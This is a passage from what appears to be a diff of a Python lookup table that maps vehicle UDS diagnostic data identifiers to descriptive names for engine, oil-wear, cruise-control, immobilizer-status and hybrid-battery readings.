sensor" -UDS_RDBI.dataIdentifiers[0x20d1] = "Adaptation raw offset on injection time with proportionnal upstream O2 sensor Bosch calculation value" -UDS_RDBI.dataIdentifiers[0x20d3] = "Factor to correct UEGO signal aging shifting" -UDS_RDBI.dataIdentifiers[0x20d4] = "Indicator of UEGO sensor signal first gain correction achieved when sensor is changed" -UDS_RDBI.dataIdentifiers[0x20d5] = "Downstream lambda sensor bench mode required for homologation" -UDS_RDBI.dataIdentifiers[0x20dc] = "Air flap configuration boolean" -UDS_RDBI.dataIdentifiers[0x20dd] = "Variable for presence of oil heater vapours conf choice" -UDS_RDBI.dataIdentifiers[0x20de] = "Ambient temperature" -UDS_RDBI.dataIdentifiers[0x20e0] = "20E1 2100" -UDS_RDBI.dataIdentifiers[0x20e1] = "Next gear position by shift pattern" -UDS_RDBI.dataIdentifiers[0x20e8] = "Maintenance mode status Roller bench mode information" -UDS_RDBI.dataIdentifiers[0x20f1] = "Position setpoint of the inlet throttle sent by the monitoring system" -UDS_RDBI.dataIdentifiers[0x20f4] = "Distance vehicle non resetable calculated by the ECM in decameter" -UDS_RDBI.dataIdentifiers[0x20f5] = "Ice powertrain setpoint elaborated from RAW" -UDS_RDBI.dataIdentifiers[0x20f8] = "Final position setpoint for multiways valve value" -UDS_RDBI.dataIdentifiers[0x20f9] = "Multiways valve position sensor" -UDS_RDBI.dataIdentifiers[0x20fa] = "Supervisor for thermo management" -UDS_RDBI.dataIdentifiers[0x20fb] = "Heater valve flow command value" -UDS_RDBI.dataIdentifiers[0x20ff] = "Relay electrical failure feedback" -UDS_RDBI.dataIdentifiers[0x2100] = "2101 2020" -UDS_RDBI.dataIdentifiers[0x2101] = "Kraftstoffdruck Sensorspannung" # or 4 last stored values of the oil drain type -UDS_RDBI.dataIdentifiers[0x2102] = "Hebelgeber 1 Signalspannung" -UDS_RDBI.dataIdentifiers[0x2103] = "Hebelgeber 2 Signalspannung" -UDS_RDBI.dataIdentifiers[0x2104] = "Kraftstoffqualitaetssensor Signalfrequenz" -UDS_RDBI.dataIdentifiers[0x2105] = "Kraftstoffqualitaetssensor DutyCycle" -UDS_RDBI.dataIdentifiers[0x2106] = "NVLD Switch Spannung Low" # or Actual geographic zone -UDS_RDBI.dataIdentifiers[0x2107] = "NVLD Switch Spannung High" -UDS_RDBI.dataIdentifiers[0x2108] = "Total vehicle distance stored at the last pre alert" -UDS_RDBI.dataIdentifiers[0x2109] = "First number of vehicle kilometers for the remaining potential calculation" -UDS_RDBI.dataIdentifiers[0x210a] = "vehicle kilometers for the remaining potential calculation" -UDS_RDBI.dataIdentifiers[0x210b] = "First oil wear for the remaining potential calculation" -UDS_RDBI.dataIdentifiers[0x210c] = "oil wear for the remaining potential calculation" -UDS_RDBI.dataIdentifiers[0x210d] = "Number of remaining vehicle kilometers at the last key off" -UDS_RDBI.dataIdentifiers[0x210e] = "Number of engine revolutions since the last oil drain" -UDS_RDBI.dataIdentifiers[0x210f] = "Internal number of the last oil drain" -UDS_RDBI.dataIdentifiers[0x2110] = "Total vehicle distance at the last oil drain" -UDS_RDBI.dataIdentifiers[0x2111] = "Last oil drain type" -UDS_RDBI.dataIdentifiers[0x2112] = "Boolean to initialise strategies in case of after sales oil drain" -UDS_RDBI.dataIdentifiers[0x2113] = "Oil temperature for oil wear estimation on previous engine off" -UDS_RDBI.dataIdentifiers[0x2114] = "Boolean set if the first oil dilution threshold is passed" # or Kupplungspedalsensor ROH -UDS_RDBI.dataIdentifiers[0x2115] = "Boolean set if the second oil dilution threshold is passed" # or Kupplungspedalsensor -UDS_RDBI.dataIdentifiers[0x211a] = "Interpolation raw factor" -UDS_RDBI.dataIdentifiers[0x211b] = "oil dilution rate for oil wear estimation" -UDS_RDBI.dataIdentifiers[0x211c] = "Rounded oil dilution potential meters" -UDS_RDBI.dataIdentifiers[0x211d] = "Vehicle kilometers memorisation trigger before rising edge" -UDS_RDBI.dataIdentifiers[0x211e] = "Oil drain requested by the strategy" -UDS_RDBI.dataIdentifiers[0x211f] = "Oil soot rate" -UDS_RDBI.dataIdentifiers[0x2120] = "2121 2140" -UDS_RDBI.dataIdentifiers[0x2121] = "Ansauglufttemperatur im Saugrohr im Kaltstart" -UDS_RDBI.dataIdentifiers[0x2122] = "Ansauglufttemperatur im Kaltstart" -UDS_RDBI.dataIdentifiers[0x2127] = "Sekundaerluft Druck ROH" -UDS_RDBI.dataIdentifiers[0x2128] = "Sekundaerluft Druck" -UDS_RDBI.dataIdentifiers[0x2129] = "Klimaanlagen Druck ROH" -UDS_RDBI.dataIdentifiers[0x212a] = "Klimaanlagen Druck" -UDS_RDBI.dataIdentifiers[0x2130] = "Sonde Vor Kat Waermemenge IST fuer TPE" -UDS_RDBI.dataIdentifiers[0x2132] = "Sonde Vor Kat Waermemenge SOLL fuer TPE" -UDS_RDBI.dataIdentifiers[0x2134] = "Sonde Nach Kat Waermemenge IST fuer TPE" -UDS_RDBI.dataIdentifiers[0x2136] = "Sonde Nach Kat Waermemenge SOLL fuer TPE" -UDS_RDBI.dataIdentifiers[0x2140] = "2141 2160" -UDS_RDBI.dataIdentifiers[0x2141] = "TRZ Value of the coeficient beta corrected by adaptative strategy during half turn of cyl 1 and 4 for torque computat" -UDS_RDBI.dataIdentifiers[0x2142] = "TRZ the learning trz beta correction is validated" -UDS_RDBI.dataIdentifiers[0x2143] = "TRZ Value of the coeficient beta corrected by adaptative strategy during half turn of cyl 2 and 3 for torque computat" -UDS_RDBI.dataIdentifiers[0x2144] = "TRZ Learning crankshaft defaults half turn counter" -UDS_RDBI.dataIdentifiers[0x2145] = "TRZ TRZ adaptive correction for torque calculation when cyl 1 and 4 are in combustion filtered beta value for cylind" -UDS_RDBI.dataIdentifiers[0x2146] = "TRZ TRZ adaptive correction for torque calculation when cyl 2 and 3 are in combustion filtered beta value for cylind" -UDS_RDBI.dataIdentifiers[0x2147] = "TLZ Status of target adaptive process" -UDS_RDBI.dataIdentifiers[0x2157] = "TLZ Maximum engine speed for misfiring detection strategy" -UDS_RDBI.dataIdentifiers[0x215a] = "TLZ Learning counter for realized half turn default" -UDS_RDBI.dataIdentifiers[0x215b] = "TLZ Learning half turn default state" -UDS_RDBI.dataIdentifiers[0x215c] = "TLZ learning filtered value" -UDS_RDBI.dataIdentifiers[0x215d] = "TLZ TLZ adaptive correction" -UDS_RDBI.dataIdentifiers[0x215e] = "Distance driven since torque meter init" -UDS_RDBI.dataIdentifiers[0x215f] = "Consolidated intake camshaft level" -UDS_RDBI.dataIdentifiers[0x2160] = "2161 2180" -UDS_RDBI.dataIdentifiers[0x2161] = "Crankshaft signal" -UDS_RDBI.dataIdentifiers[0x2162] = "Counter of loose of crankshaft synchronization" -UDS_RDBI.dataIdentifiers[0x2163] = "Angular position of engine" -UDS_RDBI.dataIdentifiers[0x2164] = "Long engine start request" -UDS_RDBI.dataIdentifiers[0x2165] = "TLZ High speed and fast adaptative crank shaft learning strategy finished" -UDS_RDBI.dataIdentifiers[0x2166] = "External controls safety authorization flag" -UDS_RDBI.dataIdentifiers[0x2167] = "Oil pump monitored command" -UDS_RDBI.dataIdentifiers[0x2168] = "Cumulative number of engine starts" -UDS_RDBI.dataIdentifiers[0x2169] = "Number of engine first starts or number of trips done by the vehicle" -UDS_RDBI.dataIdentifiers[0x216a] = "Cumulative number of engine starts non resettable" -UDS_RDBI.dataIdentifiers[0x216b] = "Number of engine first starts or number of trips done by the vehicle non resettable" -UDS_RDBI.dataIdentifiers[0x216c] = "Distance vehicle non resetable calculated by the ECM" -UDS_RDBI.dataIdentifiers[0x216d] = "Vehicle speed autoconfiguration" -UDS_RDBI.dataIdentifiers[0x216e] = "Autoconfiguration variable for air conditionning" -UDS_RDBI.dataIdentifiers[0x216f] = "State of EMCU Control Unit for CAN failure detection" -UDS_RDBI.dataIdentifiers[0x2170] = "CCSL State of the system causes for normal CCSL deactivation 2nd byte" -UDS_RDBI.dataIdentifiers[0x2172] = "Reference software calbration number used by tunning team VMAP" -UDS_RDBI.dataIdentifiers[0x2174] = "ACC Force request confirmed from CAN" -UDS_RDBI.dataIdentifiers[0x2175] = "ACC status from CAN" -UDS_RDBI.dataIdentifiers[0x2176] = "Vehicle acceleration state form CAN" -UDS_RDBI.dataIdentifiers[0x2177] = "Pressure Request status from ACC" -UDS_RDBI.dataIdentifiers[0x2178] = "Force request from ACC" -UDS_RDBI.dataIdentifiers[0x2179] = "Driver force setpoint" -UDS_RDBI.dataIdentifiers[0x217a] = "Confirmed failure corresponding to the checks on ACC" -UDS_RDBI.dataIdentifiers[0x217b] = "ACC steering wheel switches connection detection Stored in EEPROM" -UDS_RDBI.dataIdentifiers[0x217c] = "Detect ACC option with security on configuration detection Stored in EEPROM" -UDS_RDBI.dataIdentifiers[0x217d] = "Maximum duration of DISTANCE button press" -UDS_RDBI.dataIdentifiers[0x2180] = "2181 21A0" -UDS_RDBI.dataIdentifiers[0x2181] = "Mileage recording" -UDS_RDBI.dataIdentifiers[0x2184] = "Requested speed setpoint for FSL function" -UDS_RDBI.dataIdentifiers[0x2186] = "Idle speed for LCV accessories activation requested by BCM" -UDS_RDBI.dataIdentifiers[0x2187] = "State of the CTP cutoff" -UDS_RDBI.dataIdentifiers[0x2188] = "State of the CTP unicing" -UDS_RDBI.dataIdentifiers[0x218d] = "Final PTC level" -UDS_RDBI.dataIdentifiers[0x218e] = "PTC freeze request" -UDS_RDBI.dataIdentifiers[0x218f] = "PTC cut off request" -UDS_RDBI.dataIdentifiers[0x2190] = "Torque safety monitoring status flags for snapshot data" -UDS_RDBI.dataIdentifiers[0x2191] = "Power consumed by PTC" -UDS_RDBI.dataIdentifiers[0x2192] = "PTC cabin fan state" -UDS_RDBI.dataIdentifiers[0x2193] = "PTC Cabin fan request detection" -UDS_RDBI.dataIdentifiers[0x2195] = "PTC engine idle speed increase request" -UDS_RDBI.dataIdentifiers[0x219b] = "Maximum vehicle speed to authorize commercial vehicle accessories accelerated idle speed" -UDS_RDBI.dataIdentifiers[0x219c] = "Detection of a failure that causes commercial vehicle accessories accelerated idle speed deactivation" -UDS_RDBI.dataIdentifiers[0x21a0] = "21A1 21C0" -UDS_RDBI.dataIdentifiers[0x21a1] = "TDC decrementing counter for HBN fast adaptive process used on the first value of the main TDC counter" -UDS_RDBI.dataIdentifiers[0x21a2] = "Slow adaptive process finished" -UDS_RDBI.dataIdentifiers[0x21a3] = "Validity of the learned default value" -UDS_RDBI.dataIdentifiers[0x21a4] = "Filtered adaptive value for the first value of the TDC counter during slow adaptive process" -UDS_RDBI.dataIdentifiers[0x21a5] = "Filtered adaptive value for the first value of the TDC counter in the first speed range" -UDS_RDBI.dataIdentifiers[0x21a6] = "Filtered adaptive value for the first value of the TDC counter in the second speed range" -UDS_RDBI.dataIdentifiers[0x21a7] = "Filtered adaptive value for the first value of the TDC counter in the third speed range" -UDS_RDBI.dataIdentifiers[0x21a8] = "Filtered adaptive value for the first value of the TDC counter in the 4th speed range" -UDS_RDBI.dataIdentifiers[0x21a9] = "Filtered adaptive value for the first value of the TDC counter in the 5th speed range" -UDS_RDBI.dataIdentifiers[0x21aa] = "Filtered adaptive value for the first value of the TDC counter in the 6th speed range" -UDS_RDBI.dataIdentifiers[0x21ab] = "TDC decrementing counter for HBN fast adaptive process used on the second value of the main TDC counter" -UDS_RDBI.dataIdentifiers[0x21ac] = "Filtered adaptive value for the second value of the TDC counter during slow adaptive process" -UDS_RDBI.dataIdentifiers[0x21ad] = "Filtered adaptive value for the second value of the TDC counter in the first speed range" -UDS_RDBI.dataIdentifiers[0x21ae] = "Filtered adaptive value for the second value of the TDC counter in the second speed range" -UDS_RDBI.dataIdentifiers[0x21af] = "Filtered adaptive value for the second value of the TDC counter in the third speed range" -UDS_RDBI.dataIdentifiers[0x21b0] = "Filtered adaptive value for the second value of the TDC counter in the 4th speed range" -UDS_RDBI.dataIdentifiers[0x21b1] = "Filtered adaptive value for the second value of the TDC counter in the 5th speed range" -UDS_RDBI.dataIdentifiers[0x21b2] = "Filtered adaptive value for the second value of the TDC counter in the 6th speed range" -UDS_RDBI.dataIdentifiers[0x21b3] = "TDC decrementing counter for HBN fast adaptive process used on the third value of the main TDC counter" -UDS_RDBI.dataIdentifiers[0x21b4] = "Filtered adaptive value for the third value of the TDC counter during slow adaptive process" -UDS_RDBI.dataIdentifiers[0x21b5] = "Filtered adaptive value for the third value of the TDC counter in the first speed range" -UDS_RDBI.dataIdentifiers[0x21b6] = "Filtered adaptive value for the third value of the TDC counter in the second speed range" -UDS_RDBI.dataIdentifiers[0x21b7] = "Filtered adaptive value for the third value of the TDC counter in the third speed range" -UDS_RDBI.dataIdentifiers[0x21b8] = "Filtered adaptive value for the third value of the TDC counter in the 4th speed range" -UDS_RDBI.dataIdentifiers[0x21b9] = "Filtered adaptive value for the third value of the TDC counter in the 5th speed range" -UDS_RDBI.dataIdentifiers[0x21ba] = "Filtered adaptive value for the third value of the TDC counter in the 6th speed range" -UDS_RDBI.dataIdentifiers[0x21bb] = "Status of target adaptive process" -UDS_RDBI.dataIdentifiers[0x21bc] = "Last achieved adaptive value" -UDS_RDBI.dataIdentifiers[0x21bd] = "Default learning counter on the first value of the main TDC counter" -UDS_RDBI.dataIdentifiers[0x21be] = "Default learning counter on the second value of the main TDC counter" -UDS_RDBI.dataIdentifiers[0x21bf] = "Default learning counter on the third value of the main TDC counter" -UDS_RDBI.dataIdentifiers[0x21c0] = "21C1 21E0" -UDS_RDBI.dataIdentifiers[0x21c1] = "Learned filtered value on the first value of the main TDC counter" -UDS_RDBI.dataIdentifiers[0x21c2] = "Learned filtered value on the 2nd value of the main TDC counter" -UDS_RDBI.dataIdentifiers[0x21c3] = "Learned filtered value on the third value of the main TDC counter" -UDS_RDBI.dataIdentifiers[0x21c4] = "HBN adaptive correction" -UDS_RDBI.dataIdentifiers[0x21c5] = "Distance driven since torque meter init Write 2" -UDS_RDBI.dataIdentifiers[0x21c6] = "Maximum engine speed for misfiring detection strategy" -UDS_RDBI.dataIdentifiers[0x21c7] = "Vehicle distance at last succesfull detection test Fuel level or Vehicle distance" -UDS_RDBI.dataIdentifiers[0x21c8] = "HBN adaptive correction 01" -UDS_RDBI.dataIdentifiers[0x21cd] = "User SOC" -UDS_RDBI.dataIdentifiers[0x21ce] = "Electrical Energy Management DCDC status" -UDS_RDBI.dataIdentifiers[0x21d2] = "State of DCDC Unit for CAN failure detection" -UDS_RDBI.dataIdentifiers[0x21dd] = "Management System 2 ECU state" -UDS_RDBI.dataIdentifiers[0x21df] = "Low voltage power supply current supply by DCDC" -UDS_RDBI.dataIdentifiers[0x21e0] = "21E1 21FF" -UDS_RDBI.dataIdentifiers[0x21e6] = "Accumulated failure time for ivld management" -UDS_RDBI.dataIdentifiers[0x21e7] = "Accumulated mileage buffer in highway conditions" -UDS_RDBI.dataIdentifiers[0x21e8] = "Number of significant cases of highway conditions" -UDS_RDBI.dataIdentifiers[0x21e9] = "Average mileage between two significant cases of highway condition" -UDS_RDBI.dataIdentifiers[0x21ea] = "Cumulated mileage in highway conditions" -UDS_RDBI.dataIdentifiers[0x21eb] = "Mileage rate of highway conditions" -UDS_RDBI.dataIdentifiers[0x21ec] = "Accumulated mileage buffer in road conditions" -UDS_RDBI.dataIdentifiers[0x21ed] = "Cumulated mileage in road conditions" -UDS_RDBI.dataIdentifiers[0x21ee] = "Mileage rate of road conditions" -UDS_RDBI.dataIdentifiers[0x21ef] = "Accumulated mileage buffer in urban conditions" -UDS_RDBI.dataIdentifiers[0x21f0] = "Cumulated mileage in urban conditions" -UDS_RDBI.dataIdentifiers[0x21f1] = "Mileage rate of urban conditions" -UDS_RDBI.dataIdentifiers[0x2200] = "2201 2220" -UDS_RDBI.dataIdentifiers[0x2201] = "Kraftstoffdruck Sensorspannung ROH" -UDS_RDBI.dataIdentifiers[0x2202] = "Hebelgeber 1 Spannung ROH" -UDS_RDBI.dataIdentifiers[0x2203] = "Hebelgeber 2 Spannung ROH" -UDS_RDBI.dataIdentifiers[0x2206] = "NVLD Switch Spannung Low ROH" -UDS_RDBI.dataIdentifiers[0x2207] = "NVLD Switch Spannung High ROH" # or Motor fan failure status on the CAN -UDS_RDBI.dataIdentifiers[0x220a] = "State of Inverter Unit for CAN failure detection" -UDS_RDBI.dataIdentifiers[0x2218] = "Environmental temperature" -UDS_RDBI.dataIdentifiers[0x221a] = "State of BMS Unit for CAN failure detection" -UDS_RDBI.dataIdentifiers[0x221e] = "Emergency engine stop request" -UDS_RDBI.dataIdentifiers[0x2220] = "2221 2240" -UDS_RDBI.dataIdentifiers[0x2221] = "Brake pedal states validity indicator is in the limp home data status" -UDS_RDBI.dataIdentifiers[0x2222] = "Filtered unavailable clutch pedal status information" -UDS_RDBI.dataIdentifiers[0x2223] = "Engine control request for cruise control abnormal deactivation" -UDS_RDBI.dataIdentifiers[0x2224] = "Engine control request for cruise control system deactivation" -UDS_RDBI.dataIdentifiers[0x2225] = "Vehicle speed received on the CAN network not available after a filtering time" -UDS_RDBI.dataIdentifiers[0x2226] = "Displayed vehicle speed received on the CAN network not available after a filtering time" -UDS_RDBI.dataIdentifiers[0x2227] = "Engine control request for speed limiter abnormal deactivation" -UDS_RDBI.dataIdentifiers[0x2228] = "Engine control request for speed limiter system deactivation" -UDS_RDBI.dataIdentifiers[0x2229] = "Air conditioning request detection" -UDS_RDBI.dataIdentifiers[0x222a] = "Relative air conditioning pressure" -UDS_RDBI.dataIdentifiers[0x222b] = "Automatic or manual parking brake detected" -UDS_RDBI.dataIdentifiers[0x222c] = "Begin stroke clutch pedal switch for cruise control safety" -UDS_RDBI.dataIdentifiers[0x222d] = "Begin stroke clutch pedal switch for cruise control" -UDS_RDBI.dataIdentifiers[0x222e] = "Neutral engaged switch for manual gearbox" -UDS_RDBI.dataIdentifiers[0x222f] = "Authorization to connect cruise control and speed limiter options" -UDS_RDBI.dataIdentifiers[0x2230] = "Boolean to allow increment of Vxx clu stal ctr" -UDS_RDBI.dataIdentifiers[0x2231] = "Counter of stalling of type clutch failed starting up due to the software lock" -UDS_RDBI.dataIdentifiers[0x2232] = "Counter of success of cylinder recognition in idle speed regulation" -UDS_RDBI.dataIdentifiers[0x2233] = "Counter of confirmation of phase in using cylinder recognition running vehicule" -UDS_RDBI.dataIdentifiers[0x2234] = "Failure counter for cylinder recognition" -UDS_RDBI.dataIdentifiers[0x2235] = "Cylinder recognition counter" -UDS_RDBI.dataIdentifiers[0x2236] = "Cylinder recognition counter in idle speed regulation" -UDS_RDBI.dataIdentifiers[0x2237] = "Failure counter for idle speed speed regulation not confirmed by cylinder recognition for running vehicle" -UDS_RDBI.dataIdentifiers[0x2238] = "Counter of success od cylinder recognition in idle speed regulation" -UDS_RDBI.dataIdentifiers[0x2239] = "Counter of no decision of cylinder recognition" -UDS_RDBI.dataIdentifiers[0x223a] = "Counter of no decision of cylinder recognition in RR mode" -UDS_RDBI.dataIdentifiers[0x223b] = "Rephasing counter after cylinder recognition in running vehicle" -UDS_RDBI.dataIdentifiers[0x223e] = "Consolidated braking pressure" -UDS_RDBI.dataIdentifiers[0x2240] = "2241 2260" -UDS_RDBI.dataIdentifiers[0x2241] = "Allow comparison between measured angular positions of the camshaft wheel active edges and values stored in EEPROM Rea" -UDS_RDBI.dataIdentifiers[0x2242] = "Angular position stored in EEPROM for the active edge n 0 camshatf wheel" -UDS_RDBI.dataIdentifiers[0x2243] = "Angular position stored in EEPROM for the active edge n 1 camshatf wheel" -UDS_RDBI.dataIdentifiers[0x2244] = "Angular position stored in EEPROM for the active edge n 2 camshatf wheel" -UDS_RDBI.dataIdentifiers[0x2245] = "Angular position stored in EEPROM for the active edge n 3 camshatf wheel" -UDS_RDBI.dataIdentifiers[0x2246] = "Integral torque correction Idle Speed regulator" -UDS_RDBI.dataIdentifiers[0x2247] = "Oscillation detected failure local counter for inlet throttle" -UDS_RDBI.dataIdentifiers[0x2248] = "Immobilizer 2 Failure of coded line" -UDS_RDBI.dataIdentifiers[0x2249] = "Immobilizer 2 ECM is locked" -UDS_RDBI.dataIdentifiers[0x224a] = "Immobilizer 2 ECM is protected" -UDS_RDBI.dataIdentifiers[0x224b] = "Immobilizer 2 Failure of EEPROM area" -UDS_RDBI.dataIdentifiers[0x224c] = "Immobilizer 2 Secret key learnt" -UDS_RDBI.dataIdentifiers[0x224d] = "PWM control applied to the driver of the exhaust VVTC solenoid valve" -UDS_RDBI.dataIdentifiers[0x224e] = "Angular position of the exhaust VVTC system" -UDS_RDBI.dataIdentifiers[0x224f] = "Angular position setpoint of the exhaust VVTC system" -UDS_RDBI.dataIdentifiers[0x2255] = "Filtered angular position of the exhaust VVTC system" -UDS_RDBI.dataIdentifiers[0x2260] = "2261 2280" -UDS_RDBI.dataIdentifiers[0x2261] = "Power steering manostat activation" -UDS_RDBI.dataIdentifiers[0x2262] = "Activation request solenoid valve of additional fuel tank" -UDS_RDBI.dataIdentifiers[0x2263] = "Activation request pump of additional fuel tank" -UDS_RDBI.dataIdentifiers[0x2264] = "Flow water valve command of water system" -UDS_RDBI.dataIdentifiers[0x2280] = "2281 22A0" -UDS_RDBI.dataIdentifiers[0x2281] = "oil soot rate for oil wear estimation" -UDS_RDBI.dataIdentifiers[0x2282] = "Interpolation raw factor from oil dilution to oil soot" -UDS_RDBI.dataIdentifiers[0x2287] = "Rounded oil soot potential meters" -UDS_RDBI.dataIdentifiers[0x228c] = "Vehicle kilometer when the alert appears" -UDS_RDBI.dataIdentifiers[0x228d] = "Total vehicle distance when the oil soot becomes to high stored on EEPROM" -UDS_RDBI.dataIdentifiers[0x228e] = "Oil potential kilometers during one by one km decrementation" -UDS_RDBI.dataIdentifiers[0x228f] = "Type of initialisation when the state of the counter is 0" -UDS_RDBI.dataIdentifiers[0x2290] = "Type of initialisation when the state of the counter is" -UDS_RDBI.dataIdentifiers[0x2291] = "Type of initialisation when the state of the counter is 2" -UDS_RDBI.dataIdentifiers[0x2292] = "Type of initialisation when the state of the counter is 3" -UDS_RDBI.dataIdentifiers[0x2293] = "normal mode oil dilution rate" -UDS_RDBI.dataIdentifiers[0x2294] = "raw oil dilution rate" -UDS_RDBI.dataIdentifiers[0x2295] = "Interval time in full load mode" -UDS_RDBI.dataIdentifiers[0x2296] = "Interval time between two regenerations" -UDS_RDBI.dataIdentifiers[0x2298] = "Oil potential kilometers calculated" -UDS_RDBI.dataIdentifiers[0x2299] = "Calculated oil potential in kilometers can be negative" -UDS_RDBI.dataIdentifiers[0x22a0] = "22A1 22C0" -UDS_RDBI.dataIdentifiers[0x22a9] = "SCR Control Unit DCU counter for validated CAN failure detection" -UDS_RDBI.dataIdentifiers[0x22aa] = "Cumulative number of engine starts for starter reliability" -UDS_RDBI.dataIdentifiers[0x22ac] = "Cause of the failsafe reaction triggered by level 2 monitoring" -UDS_RDBI.dataIdentifiers[0x22ad] = "First context data for level 2 monitoring function failure" -UDS_RDBI.dataIdentifiers[0x22ae] = "Second context data for level 2 monitoring function failure" -UDS_RDBI.dataIdentifiers[0x22af] = "Third context data for level 2 monitoring function failure" -UDS_RDBI.dataIdentifiers[0x22b0] = "Fourth context data for level 2 monitoring function failure" -UDS_RDBI.dataIdentifiers[0x22b6] = "Wire begin clutch contactor state" -UDS_RDBI.dataIdentifiers[0x22b8] = "Anticipated coupler state" -UDS_RDBI.dataIdentifiers[0x22bc] = "Dynamic mode request received on the CAN" -UDS_RDBI.dataIdentifiers[0x22bd] = "Eco mode request received on the CAN" -UDS_RDBI.dataIdentifiers[0x22be] = "Drive mode received on the CAN" -UDS_RDBI.dataIdentifiers[0x22bf] = "Power supply voltage raw acquisition of cylinder pressure sensor" -UDS_RDBI.dataIdentifiers[0x2400] = "2401 2420" -UDS_RDBI.dataIdentifiers[0x2401] = "Boost pressure" -UDS_RDBI.dataIdentifiers[0x2402] = "Boost pressure setpoint" -UDS_RDBI.dataIdentifiers[0x2406] = "Inlet throttle PWM command" -UDS_RDBI.dataIdentifiers[0x240b] = "Intake manifold pressure" -UDS_RDBI.dataIdentifiers[0x240d] = "Intake air temperature" -UDS_RDBI.dataIdentifiers[0x2411] = "State Of Charge" -UDS_RDBI.dataIdentifiers[0x2414] = "Throttle valve position setpoint" -UDS_RDBI.dataIdentifiers[0x2415] = "Throttle valve position track" -UDS_RDBI.dataIdentifiers[0x2416] = "Maximum Hybrid Battery Module Temperature" -UDS_RDBI.dataIdentifiers[0x2417] = "Minimum Hybrid Battery Module Temperature" -UDS_RDBI.dataIdentifiers[0x2418] = "Throttle valve position sensor voltage track" -UDS_RDBI.dataIdentifiers[0x2419] = "Throttle valve position sensor voltage track" -UDS_RDBI.dataIdentifiers[0x2420] = "2421 2440" -UDS_RDBI.dataIdentifiers[0x2422] = "Amount of air pumped into cylinder" -UDS_RDBI.dataIdentifiers[0x2426] = "Regenerative Braking Axle Torque Request" -UDS_RDBI.dataIdentifiers[0x2427] = "Engine Torque Actual" -UDS_RDBI.dataIdentifiers[0x2428] = "Commanded Axle Torque Predicted" -UDS_RDBI.dataIdentifiers[0x2429] = "Axle Torque Actual" -UDS_RDBI.dataIdentifiers[0x242a] = "Strong Hybrid Limp-Home" -UDS_RDBI.dataIdentifiers[0x242b] = "Estimated Regenerative Braking Axle Torque" -UDS_RDBI.dataIdentifiers[0x242c] = "Driver Intended Total Brake Torque" -UDS_RDBI.dataIdentifiers[0x242d] = "Commanded Axle Torque Immediate" -UDS_RDBI.dataIdentifiers[0x242e] = "Internal Combustion Engine" -UDS_RDBI.dataIdentifiers[0x242f] = "MCPA Motor B Current Offset Phase A" # or MCPB Motor A Current Offset Phase " # or Throttle valve position -UDS_RDBI.dataIdentifiers[0x2430] = "MCPB Motor A Current Offset Phase B" # or MCPA Motor B Current Offset Phase " -UDS_RDBI.dataIdentifiers[0x2431] = "MCPB Motor A Current Offset Phase C" # or MCPA Motor B Current Offset Phase " -UDS_RDBI.dataIdentifiers[0x2432] = "Engine Crank Speed Commanded" -UDS_RDBI.dataIdentifiers[0x2433] = "Internal Combustion Engine Cranking" -UDS_RDBI.dataIdentifiers[0x2434] = "Driver Intended Axle Torque" -UDS_RDBI.dataIdentifiers[0x2435] = "BSE x EE NV Data.EE OldEE09" -UDS_RDBI.dataIdentifiers[0x2436] = "kWhr Round Trip" -UDS_RDBI.dataIdentifiers[0x2437] = "Commanded Predicted Engine Torque" -UDS_RDBI.dataIdentifiers[0x2438] = "Commanded Immediate Engine Torque" -UDS_RDBI.dataIdentifiers[0x2439] = "BSE x EE NV Data.EE OldEE07" -UDS_RDBI.dataIdentifiers[0x243f] = "Intake manifold temperature" -UDS_RDBI.dataIdentifiers[0x2440] = "2441 2460" # or VeBSEC k BSEinitState -UDS_RDBI.dataIdentifiers[0x2441] = "Ahr Charge" -UDS_RDBI.dataIdentifiers[0x2442] = "Ahr DisCharge" -UDS_RDBI.dataIdentifiers[0x2443] = "VeAPIC Output1" -UDS_RDBI.dataIdentifiers[0x2445] = "VeAPIC Output12" -UDS_RDBI.dataIdentifiers[0x2446] = "VeAPIC Output4 " -UDS_RDBI.dataIdentifiers[0x2447] = "VeAPIC Output5" -UDS_RDBI.dataIdentifiers[0x2448] = "VeAPIC Output6 " # or Pressure before turbine -UDS_RDBI.dataIdentifiers[0x2449] = "VeAPIC Output13" # or Catalyst exhaust gas upstream oxygen sensor voltage -UDS_RDBI.dataIdentifiers[0x244a] = "Catalyst exhaust gas downstream oxygen sensor voltage" -UDS_RDBI.dataIdentifiers[0x244b] = "Catalyst exhaust gas upstream oxygen resistance heater PWM command" -UDS_RDBI.dataIdentifiers[0x244c] = "Catalyst exhaust gas downstream oxygen resistance heater PWM command" -UDS_RDBI.dataIdentifiers[0x244d] = "Inlet throttle upstream temperature" -UDS_RDBI.dataIdentifiers[0x2450] = "VeAPIC Output9" -UDS_RDBI.dataIdentifiers[0x2451] = "b contactor command" -UDS_RDBI.dataIdentifiers[0x2452] = "b HS Comm" -UDS_RDBI.dataIdentifiers[0x2453] = "b Proper Shutdown" -UDS_RDBI.dataIdentifiers[0x2454] = "BSE x EE NV Data.EE OldEE01" -UDS_RDBI.dataIdentifiers[0x2455] = "BSE x EE NV Data.EE OldEE02" -UDS_RDBI.dataIdentifiers[0x2456] = "BSE x EE NV Data.EE OldEE03" -UDS_RDBI.dataIdentifiers[0x2457] = "BSE x EE NV Data.EE OldEE04" -UDS_RDBI.dataIdentifiers[0x2458] = "BSE x EE NV Data.EE OldEE05" # or Throttle valve offset min position track 2 -UDS_RDBI.dataIdentifiers[0x2459] = "BSE x EE NV Data.EE OldEE06" -UDS_RDBI.dataIdentifiers[0x245a] = "Throttle valve offset limp home position track 2" -UDS_RDBI.dataIdentifiers[0x245b] = "Throttle valve offset max position track" -UDS_RDBI.dataIdentifiers[0x245c] = "Throttle valve offset max position track 2" -UDS_RDBI.dataIdentifiers[0x245d] = "Throttle valve offset first learnings successfully done" -UDS_RDBI.dataIdentifiers[0x245e] = "Engine air load" -UDS_RDBI.dataIdentifiers[0x2460] = "BSE x EE NV Data.EE Pct OldPackSOC" # or 2461 2480 -UDS_RDBI.dataIdentifiers[0x2461] = "BSE x EE NV Data.EE Pct OldSOCAcc" -UDS_RDBI.dataIdentifiers[0x2462] = "BSE x EE NV Data.EE Pct SOH" -UDS_RDBI.dataIdentifiers[0x2463] = "EE BatODO" -UDS_RDBI.dataIdentifiers[0x2464] = "VeAPIC Output10 " -UDS_RDBI.dataIdentifiers[0x2465] = "BSE x EE NV Data.EE T TOld " -UDS_RDBI.dataIdentifiers[0x2466] = "BSE x EE NV Data.EE U OldVo" -UDS_RDBI.dataIdentifiers[0x2467] = "CntCtrStat" -UDS_RDBI.dataIdentifiers[0x2468] = "I Current " -UDS_RDBI.dataIdentifiers[0x2469] = "init OCV" 